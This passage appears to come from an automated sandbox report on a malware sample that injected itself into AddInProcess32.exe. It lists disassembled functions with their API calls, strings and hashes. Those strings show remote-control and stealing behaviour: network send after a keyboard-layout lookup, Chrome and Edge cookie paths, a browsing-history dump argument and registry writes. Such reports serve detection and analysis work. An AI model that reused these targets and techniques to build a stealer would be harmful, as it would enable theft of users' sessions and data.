                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 4269425633-0
                                                  • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  APIs
                                                  • _free.LIBCMT ref: 00444106
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00444118
                                                  • _free.LIBCMT ref: 0044412B
                                                  • _free.LIBCMT ref: 0044413C
                                                  • _free.LIBCMT ref: 0044414D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$NG
                                                  • API String ID: 180926312-2721294649
                                                  • Opcode ID: a116aea6cce7f39833844d943f9b7bf883fbd9be303caede3d19fb24200ec4f3
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: a116aea6cce7f39833844d943f9b7bf883fbd9be303caede3d19fb24200ec4f3
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  APIs
                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                  • String ID: XQG$NG$PG
                                                  • API String ID: 1634807452-3565412412
                                                  • Opcode ID: 1276cfc1f0336b8f4d0428515d4b66ff9690ce8565e5a736aefb7902a224826d
                                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                  • Opcode Fuzzy Hash: 1276cfc1f0336b8f4d0428515d4b66ff9690ce8565e5a736aefb7902a224826d
                                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  • API String ID: 2506810119-760905667
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  • API String ID: 368326130-3219657780
                                                  • Opcode ID: 2059961ef953fe52bed28083b6b571f2d2e70ab68c8f73ccbd5daae39f73c485
                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                  • Opcode Fuzzy Hash: 2059961ef953fe52bed28083b6b571f2d2e70ab68c8f73ccbd5daae39f73c485
                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$okmode$PG
                                                  • API String ID: 3411444782-3370592832
                                                  • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                  • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
                                                  • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  APIs
